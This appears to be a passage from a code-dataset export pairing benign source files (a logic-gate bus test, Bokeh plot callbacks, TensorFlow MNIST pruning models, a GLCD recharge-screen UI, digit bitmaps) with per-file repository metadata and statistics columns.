input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 0
input_13.value = 0
input_14.value = 0
input_15.value = 0
input_16.value = 0
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 0
input_13.value = 0
input_14.value = 0
input_15.value = 0
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 0
input_13.value = 0
input_14.value = 0
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 0
input_13.value = 0
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 0
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 1
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 1
input_5.value = 1
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 0
input_3.value = 1
input_4.value = 1
input_5.value = 1
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 0
input_2.value = 1
input_3.value = 1
input_4.value = 1
input_5.value = 1
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
enable.value = 1
input_1.value = 1
input_2.value = 1
input_3.value = 1
input_4.value = 1
input_5.value = 1
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
print(a.__doc__)
print(a)
a(
enable=1,
input_bus=(0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1),
output_bus=None
)
assert output_bus.wire_values == (
1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0)
| 27.523438
| 73
| 0.487558
| 3,299
| 21,138
| 2.915126
| 0.012428
| 0.180306
| 0.328273
| 0.075699
| 0.896849
| 0.896849
| 0.896849
| 0.89425
| 0.89425
| 0.89425
| 0
| 0.164343
| 0.413048
| 21,138
| 767
| 74
| 27.559322
| 0.610784
| 0
| 0
| 0.847527
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048077
| 1
| 0.001374
| false
| 0
| 0.001374
| 0
| 0.004121
| 0.002747
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ada3ecfcf266d5b9fda65cbe51c2da40b7e47f5b
| 42
|
py
|
Python
|
helloworld.py
|
OluSure/Hacktoberfest2021-1
|
ad1bafb0db2f0cdeaae8f87abbaa716638c5d2ea
|
[
"MIT"
] | 215
|
2021-10-01T08:18:16.000Z
|
2022-03-29T04:12:03.000Z
|
helloworld.py
|
OluSure/Hacktoberfest2021-1
|
ad1bafb0db2f0cdeaae8f87abbaa716638c5d2ea
|
[
"MIT"
] | 51
|
2021-10-01T08:16:42.000Z
|
2021-10-31T13:51:51.000Z
|
helloworld.py
|
OluSure/Hacktoberfest2021-1
|
ad1bafb0db2f0cdeaae8f87abbaa716638c5d2ea
|
[
"MIT"
] | 807
|
2021-10-01T08:11:45.000Z
|
2021-11-21T18:57:09.000Z
|
print("hello world")
print("hello World")
| 14
| 20
| 0.714286
| 6
| 42
| 5
| 0.5
| 0.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 2
| 21
| 21
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0.52381
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
bc27e6154a8e6ec21c161ff7aa2eda17c5212f7a
| 2,278
|
py
|
Python
|
main/js_functions.py
|
Khanatoshs/MET_BAP
|
51dd28e7ef909fe259164415c2d3fa8427a9329d
|
[
"MIT"
] | null | null | null |
main/js_functions.py
|
Khanatoshs/MET_BAP
|
51dd28e7ef909fe259164415c2d3fa8427a9329d
|
[
"MIT"
] | null | null | null |
main/js_functions.py
|
Khanatoshs/MET_BAP
|
51dd28e7ef909fe259164415c2d3fa8427a9329d
|
[
"MIT"
] | null | null | null |
from bokeh.models import CustomJS
def DateRangeSlider_callback(source,filter):
daterange_callback = CustomJS(args=dict(source=source,filter=filter),
code="""
const indices = [];
for(var i=0;i<source.get_length();i++){
const current_value = cb_obj.value;
const current_date = source.data['date'][i];
if(current_date >= current_value[0]&& current_date<=current_value[1]){
indices.push(i);
}
}
filter.indices = indices;
source.change.emit();
"""
)
return daterange_callback
def Button_callback(source,filter,select):
button_callback = CustomJS(args=dict(select=select,source=source,filter=filter),
code="""
const indices = [];
for(var i=0;i<source.get_length();i++){
const current_value = select.value;
const current_date = source.data['date'][i];
if(current_date >= current_value[0]&& current_date<=current_value[1]){
indices.push(i);
}
}
filter.indices = indices;
source.change.emit();
"""
)
return button_callback
def Dropdown_y1_callback(source,glyph,plot,legend_item,legend_dict):
dropdown_callback = CustomJS(args=dict(source=source,glyph=glyph,plot=plot,legend_item=legend_item,legend_dict=legend_dict),
code="""
var value = this.item;
glyph.glyph.y.field = value;
legend_item.label = legend_dict[value];
plot.y_range.start = Math.min.apply(null,source.data[value]);
plot.y_range.end = Math.max.apply(null,source.data[value]);
source.change.emit();
"""
)
return dropdown_callback
def Dropdown_y2_callback(source,glyph,plot,legend_item,legend_dict):
dropdown_callback = CustomJS(args=dict(source=source,glyph=glyph,plot=plot,legend_item=legend_item,legend_dict=legend_dict),
code="""
var value = this.item;
glyph.glyph.y.field = value;
legend_item.label = legend_dict[value];
plot.extra_y_ranges.extra_range.start = Math.min.apply(null,source.data[value]);
plot.extra_y_ranges.extra_range.end = Math.max.apply(null,source.data[value]);
source.change.emit();
"""
)
return dropdown_callback
| 37.966667
| 128
| 0.641791
| 285
| 2,278
| 4.94386
| 0.2
| 0.056778
| 0.068133
| 0.068133
| 0.841732
| 0.841732
| 0.824698
| 0.800568
| 0.800568
| 0.800568
| 0
| 0.004535
| 0.225637
| 2,278
| 60
| 129
| 37.966667
| 0.794218
| 0
| 0
| 0.596491
| 0
| 0.035088
| 0.612549
| 0.214129
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070175
| false
| 0
| 0.017544
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
70dd7f83d46be0acb840f283947c8af2323baa58
| 6,913
|
py
|
Python
|
mnist_testing/mnist_net.py
|
lightwell64646/cylindricalsfmlearner
|
2291d30eaa8318961e4e9eeed616e2aa9b22583c
|
[
"MIT"
] | null | null | null |
mnist_testing/mnist_net.py
|
lightwell64646/cylindricalsfmlearner
|
2291d30eaa8318961e4e9eeed616e2aa9b22583c
|
[
"MIT"
] | null | null | null |
mnist_testing/mnist_net.py
|
lightwell64646/cylindricalsfmlearner
|
2291d30eaa8318961e4e9eeed616e2aa9b22583c
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import sys
sys.path.insert(0, "..")
from utils import get_loss_categorical, parameter_count
import tf_cylindrical as cylin
'''
A Keras model that predicts on MNIST
since we want to run in eager mode layer.output isn't available.
We use self.last_outs instead for calculating second derivative loss.
Note: We write code in eager mode and use tf.function to run in
graph mode, but the code still has to compile as eager.
Note: If you try to add optimizer to the model parameters it expects
a fully compiled model which is (to my knowledge) not compatible
with a custom training loop. Therefore optimizer is stored in the
mnist_prune_trainer classes (single GPU and distributed).
'''
class mnist_net(tf.keras.Model):
def __init__(self, opt):
super(mnist_net, self).__init__()
self.c1 = cylin.conv2d(60, [3, 3], stride=1, padding='VALID', name = "c1",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.c2 = cylin.conv2d(60, [3, 3], stride=1, padding='VALID', name = "c2",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.c3 = cylin.conv2d(60, [3, 3], stride=1, padding='VALID', name = "c3",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.num_convolutional_layers = 3
self.flatten = cylin.flatten(name = "flattening")
self.l1 = cylin.linear(100, name = "l1",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.l2 = cylin.linear(10, name = "l2", L2Regularization=opt.l2_weight_reg)
self.last_outs = None
self.saliency_tracked_layers = [self.c1, self.c2, self.c3, self.l1]
def scramble(self):
self.c1.scramble()
self.c2.scramble()
self.c3.scramble()
self.l1.scramble()
def call(self, x):
y = self.c1(x)
y = tf.keras.layers.MaxPool2D()(y)
y = self.c2(y)
y = self.c3(y)
y = self.flatten(y)
#y = tf.reduce_sum(y, [1,2])
y = self.l1(y)
y = self.l2(y)
self.last_outs = [p.last_out for p in self.saliency_tracked_layers]
return y
def prune(self, metrics, kill_fraction = 0.1, kill_low = True, const_percent = False):
assert(len(metrics) == len(self.saliency_tracked_layers))
masks = []
decision_points = []
last_mask = None
i = 0
for dl, met in zip(self.saliency_tracked_layers, metrics):
#if (i == 0 or i == 1 or i == 3 or i == 2):
last_mask, decision_pt = dl.prune(met, last_mask, kill_fraction, kill_low, const_percent)
'''else:
dl.prune(None, last_mask, kill_fraction, kill_low, const_percent)
last_mask = tf.constant([i for i in range(dl.units)])
decision_pt = None'''
masks.append(last_mask)
decision_points.append(decision_pt)
i += 1
if i == self.num_convolutional_layers:
last_mask = self.flatten.prune(None, last_mask)
self.layers[-1].prune(None, last_mask, kill_fraction)
return masks, decision_points
class mnist_net_prune_fin_shape(tf.keras.Model):
def __init__(self, opt):
super(mnist_net_prune_fin_shape, self).__init__()
self.c1 = cylin.conv2d(23, [3, 3], stride=1, padding='VALID', name = "c1",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.c2 = cylin.conv2d(33, [3, 3], stride=1, padding='VALID', name = "c2",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.c3 = cylin.conv2d(6, [3, 3], stride=1, padding='VALID', name = "c3",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.num_convolutional_layers = 3
self.flatten = cylin.flatten(name = "flattening")
self.l1 = cylin.linear(71, name = "l1",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.l2 = cylin.linear(10, name = "l2", L2Regularization=opt.l2_weight_reg)
self.last_outs = None
self.saliency_tracked_layers = [self.c1, self.c2, self.c3, self.l1]
def scramble(self):
self.c1.scramble()
self.c2.scramble()
self.c3.scramble()
self.l1.scramble()
def call(self, x):
y = self.c1(x)
y = tf.keras.layers.MaxPool2D()(y)
y = self.c2(y)
y = self.c3(y)
y = self.flatten(y)
#y = tf.reduce_sum(y, [1,2])
y = self.l1(y)
y = self.l2(y)
self.last_outs = [p.last_out for p in self.saliency_tracked_layers]
return y
def prune(self, metrics, kill_fraction = 0.1, kill_low = True, const_percent = False):
assert(len(metrics) == len(self.saliency_tracked_layers))
masks = []
decision_points = []
last_mask = None
i = 0
for dl, met in zip(self.saliency_tracked_layers, metrics):
#if (i == 0 or i == 1 or i == 3 or i == 2):
last_mask, decision_pt = dl.prune(met, last_mask, kill_fraction, kill_low, const_percent)
'''else:
dl.prune(None, last_mask, kill_fraction, kill_low, const_percent)
last_mask = tf.constant([i for i in range(dl.units)])
decision_pt = None'''
masks.append(last_mask)
decision_points.append(decision_pt)
i += 1
if i == self.num_convolutional_layers:
last_mask = self.flatten.prune(None, last_mask)
self.layers[-1].prune(None, last_mask, kill_fraction)
return masks, decision_points
class mnist_net_strong_initialization(tf.keras.Model):
def __init__(self, opt):
super(mnist_net_strong_initialization, self).__init__()
self.c1 = cylin.conv2d(50, [5, 5], stride=1, padding='VALID', name = "c1",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.proc = cylin.conv2d(20, [5, 5], stride=1, padding='VALID', name = "proc",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.l1 = cylin.linear(50, name = "l1",
activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg)
self.l2 = cylin.linear(10, name = "l2", L2Regularization=opt.l2_weight_reg)
self.last_outs = None
def call(self, x):
y = tf.keras.layers.MaxPool2D()(self.c1(x))
y = tf.keras.layers.MaxPool2D()(self.proc(y))
y = tf.reshape(y, [-1, y.shape[1] * y.shape[2] * y.shape[3]])
y = self.l1(y)
y = self.l2(y)
self.last_outs = [self.c1.last_out, self.proc.last_out, self.l1.last_out]
return y
| 43.477987
| 102
| 0.597425
| 958
| 6,913
| 4.141962
| 0.177453
| 0.03629
| 0.074093
| 0.095262
| 0.813004
| 0.803679
| 0.78755
| 0.77369
| 0.766129
| 0.766129
| 0
| 0.035837
| 0.281499
| 6,913
| 159
| 103
| 43.477987
| 0.763036
| 0.019962
| 0
| 0.775862
| 0
| 0
| 0.016376
| 0
| 0
| 0
| 0
| 0
| 0.017241
| 1
| 0.086207
| false
| 0
| 0.034483
| 0
| 0.189655
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb1b8de0405d477af224f1fd2fe01cfa7778f9a2
| 56
|
py
|
Python
|
python_strelka_client/protocals/__init__.py
|
nighttardis/python_strelka_client
|
1b0698a6f6cd40b77ff887e445d9fd377b997925
|
[
"Apache-2.0"
] | null | null | null |
python_strelka_client/protocals/__init__.py
|
nighttardis/python_strelka_client
|
1b0698a6f6cd40b77ff887e445d9fd377b997925
|
[
"Apache-2.0"
] | null | null | null |
python_strelka_client/protocals/__init__.py
|
nighttardis/python_strelka_client
|
1b0698a6f6cd40b77ff887e445d9fd377b997925
|
[
"Apache-2.0"
] | null | null | null |
from . import strelka_pb2
from . import strelka_pb2_grpc
| 28
| 30
| 0.839286
| 9
| 56
| 4.888889
| 0.555556
| 0.454545
| 0.772727
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040816
| 0.125
| 56
| 2
| 30
| 28
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
cb8df16ec949bcedeb5ecb7e322af5ae01e2b7cd
| 5,372
|
py
|
Python
|
hexa-beta/rechargeScreen.py
|
projecthexa/hexa
|
d3ad27283903bf895c70a4f8aee2c0f899b0c797
|
[
"MIT"
] | 7
|
2018-09-12T18:53:24.000Z
|
2021-01-04T04:21:36.000Z
|
hexa-beta/rechargeScreen.py
|
SahajKhandelwal/hexa
|
d3ad27283903bf895c70a4f8aee2c0f899b0c797
|
[
"MIT"
] | null | null | null |
hexa-beta/rechargeScreen.py
|
SahajKhandelwal/hexa
|
d3ad27283903bf895c70a4f8aee2c0f899b0c797
|
[
"MIT"
] | 3
|
2018-05-24T22:16:37.000Z
|
2019-03-14T10:05:42.000Z
|
__author__ = 'guru'
#state 10 = recharge amount
#state 20 = Ask's user to place their finger on FPS
#state 30 = Scanning ur finger now
#state 31 = account not found
#state 40 = recharge successful
#screen = 0 vendor,screen = 1 customer.
import GLCD as g
currentState = 0
fontWidth = 6
lineLength = 21
def state10(rechargeAmount = "0"):
global currentState
if currentState == 10:
num(rechargeAmount)
return
currentState = 10
#vendor Screen
g.clearDisplay(0)
string = ("{:^%d}" % lineLength).format("Recharge Amount")
g.displayText(string,2,0,0)
string = ("{:<%d}" % lineLength).format("Rs.")
g.displayText(string, 3, 0, 0)
string = "{:<4}".format(rechargeAmount)
g.displayText(string, 3, (3 * fontWidth - 1), 0)
#User Screen
g.clearDisplay(1)
string = ("{:^%d}" % lineLength).format("Recharge Amount")
g.displayText(string,2,0,1)
string = ("{:<%d}" % lineLength).format("Rs.")
g.displayText(string,3,0,1)
string = "{:<4}".format(rechargeAmount)
g.displayText(string,3,(3*fontWidth-1),1)
def num(rechargeAmount):
# vendor Screen
string = "{:<4}".format(rechargeAmount)
g.displayText(string, 3, (3 * fontWidth - 1), 0)
#User Screen
string = "{:<4}".format(rechargeAmount)
g.displayText(string,3,(3*fontWidth-1),1)
def state20(amount = "0"):
global currentState
currentState = 20
#vendor Screen
g.clearDisplay(0)
string = ("{:^%d}" % lineLength).format("Recharging...")
g.displayText(string,0,0,0)
string = ("{:<%d}" % lineLength).format("Recharge Rs. ")
g.displayText(string, 2, 0, 0)
g.displayText(amount + " ?", 2, (13 * fontWidth - 1), 0)
string = ("{:<%d}" % lineLength).format("Waiting for Finger")
g.displayText(string,4,0,0)
#User Screen
g.clearDisplay(1)
string = ("{:^%d}" % lineLength).format("Recharging...")
g.displayText(string,0,0,1)
string = ("{:^%d}" % lineLength).format("Recharge Rs. ")
g.displayText(string, 2, 0, 1)
g.displayText(amount + " ?", 2, (13 * fontWidth - 1), 1)
string = ("{:^%d}" % lineLength).format("Place ur Finger")
g.displayText(string,4,0,1)
def state30():
global currentState
currentState = 30
#vendor Screen
g.clearDisplay(0)
string = ("{:^%d}" % lineLength).format("Scanning User's")
g.displayText(string,2,0,0)
string = ("{:^%d}" % lineLength).format("Finger...")
g.displayText(string,3,0,0)
#User Screen
g.clearDisplay(1)
string = ("{:^%d}" % lineLength).format("Scanning Your")
g.displayText(string,2,0,1)
string = ("{:^%d}" % lineLength).format("Finger...")
g.displayText(string,3,0,1)
def state31(amount):
global currentState
currentState = 31
#vendor Screen
g.clearDisplay(0)
string = ("{:^%d}" % lineLength).format("Account Not Found")
g.displayText(string,0,0,0)
string = ("{:^%d}" % lineLength).format("Try again")
g.displayText(string,1,0,0)
string = ("{:<%d}" % lineLength).format("Recharge Rs. ")
g.displayText(string, 3, 0, 0)
g.displayText(amount + " ?", 3, (13 * fontWidth - 1), 0)
string = ("{:<%d}" % lineLength).format("Waiting for Finger")
g.displayText(string,4,0,0)
#User Screen
g.clearDisplay(1)
string = ("{:^%d}" % lineLength).format("OOPS!")
g.displayText(string, 0, 0, 1)
string = ("{:^%d}" % lineLength).format("Account Not Found")
g.displayText(string,1,0,1)
string = ("{:^%d}" % lineLength).format("Try again")
g.displayText(string,2,0,1)
string = ("{:<%d}" % lineLength).format("Recharge Rs. ")
g.displayText(string, 4, 0, 1)
g.displayText(amount + " ?", 4, (13 * fontWidth - 1), 1)
string = ("{:<%d}" % lineLength).format("Waiting for Finger")
g.displayText(string,5,0,1)
def state40(rechargeAmount,newBalance,mobileNumber):
global currentState
currentState = 40
#vendor Screen
g.clearDisplay(0)
string = ("{:^%d}" % lineLength).format("Recharge Successful")
g.displayText(string,2,0,0)
string = ("{:<%d}" % lineLength).format("Rs.")
g.displayText(string,3,0,0)
g.displayText(rechargeAmount,3,(3*fontWidth-1),0)
string = ("{:^%d}" % lineLength).format("Current Balance is")
g.displayText(string,4,0,0)
string = ("{:<%d}" % lineLength).format("Rs.")
g.displayText(string,5,0,0)
g.displayText(newBalance,5,(3*fontWidth-1),0)
string = ("{:^%d}" % lineLength).format("Mb.no:")
g.displayText(string,6,0,0)
g.displayText(mobileNumber,6,(6*fontWidth-1),0)
#user Screen
g.clearDisplay(1)
string = ("{:^%d}" % lineLength).format("Recharge Successful")
g.displayText(string,2,0,1)
string = ("{:<%d}" % lineLength).format("Rs.")
g.displayText(string,3,0,1)
g.displayText(rechargeAmount,3,(3*fontWidth-1),1)
string = ("{:^%d}" % lineLength).format("Your Current Balance")
g.displayText(string,4,0,1)
string = ("{:<%d}" % lineLength).format("Rs.")
g.displayText(string,5,0,1)
g.displayText(newBalance,5,(3*fontWidth-1),0)
string = ("{:^%d}" % lineLength).format("Mb.no:")
g.displayText(string,6,0,1)
g.displayText(mobileNumber,6,(6*fontWidth-1),1)
| 33.36646
| 68
| 0.593261
| 671
| 5,372
| 4.743666
| 0.113264
| 0.177191
| 0.209237
| 0.238454
| 0.808043
| 0.794848
| 0.770657
| 0.715049
| 0.688659
| 0.630537
| 0
| 0.050271
| 0.211281
| 5,372
| 160
| 69
| 33.575
| 0.700968
| 0.065153
| 0
| 0.669492
| 0
| 0
| 0.127581
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050847
| false
| 0
| 0.008475
| 0
| 0.067797
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb90d8e2b5e5f919b400fc53b750b8950848e667
| 740
|
py
|
Python
|
score/number.py
|
sjoonb/osscap2020
|
ad8a71b196fcfdbdc3f9ba35e8256083beb4e3b7
|
[
"Apache-2.0"
] | null | null | null |
score/number.py
|
sjoonb/osscap2020
|
ad8a71b196fcfdbdc3f9ba35e8256083beb4e3b7
|
[
"Apache-2.0"
] | 9
|
2020-10-07T07:33:51.000Z
|
2020-12-01T13:49:11.000Z
|
score/number.py
|
sjoonb/osscap2020
|
ad8a71b196fcfdbdc3f9ba35e8256083beb4e3b7
|
[
"Apache-2.0"
] | null | null | null |
num_0 = [
[1, 1, 1],
[1, 0, 1],
[1, 0, 1],
[1, 0, 1],
[1, 1, 1]
]
num_1 = [
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0]
]
num_2 = [
[1, 1, 1],
[0, 0, 1],
[1, 1, 1],
[1, 0, 0],
[1, 1, 1]
]
num_3 = [
[1, 1, 1],
[0, 0, 1],
[1, 1, 1],
[0, 0, 1],
[1, 1, 1]
]
num_4 = [
[1, 0, 1],
[1, 0, 1],
[1, 1, 1],
[0, 0, 1],
[0, 0, 1]
]
num_5 = [
[1, 1, 1],
[1, 0, 0],
[1, 1, 1],
[0, 0, 1],
[1, 1, 1]
]
num_6 = [
[1, 1, 1],
[1, 0, 0],
[1, 1, 1],
[1, 0, 1],
[1, 1, 1]
]
num_7 = [
[1, 1, 1],
[1, 0, 1],
[0, 0, 1],
[0, 0, 1],
[0, 0, 1]
]
num_8 = [
[1, 1, 1],
[1, 0, 1],
[1, 1, 1],
[1, 0, 1],
[1, 1, 1]
]
num_9 = [
[1, 1, 1],
[1, 0, 1],
[1, 1, 1],
[0, 0, 1],
[1, 1, 1]
]
alpha_s = [
[0, 1, 1],
[1, 0, 0],
[1, 1, 1],
[0, 0, 1],
[1, 1, 0]
]
| 8.222222
| 11
| 0.3
| 187
| 740
| 1.128342
| 0.069519
| 0.691943
| 0.63981
| 0.379147
| 0.890995
| 0.890995
| 0.876777
| 0.876777
| 0.78673
| 0.620853
| 0
| 0.337187
| 0.298649
| 740
| 89
| 12
| 8.314607
| 0.069364
| 0
| 0
| 0.675325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
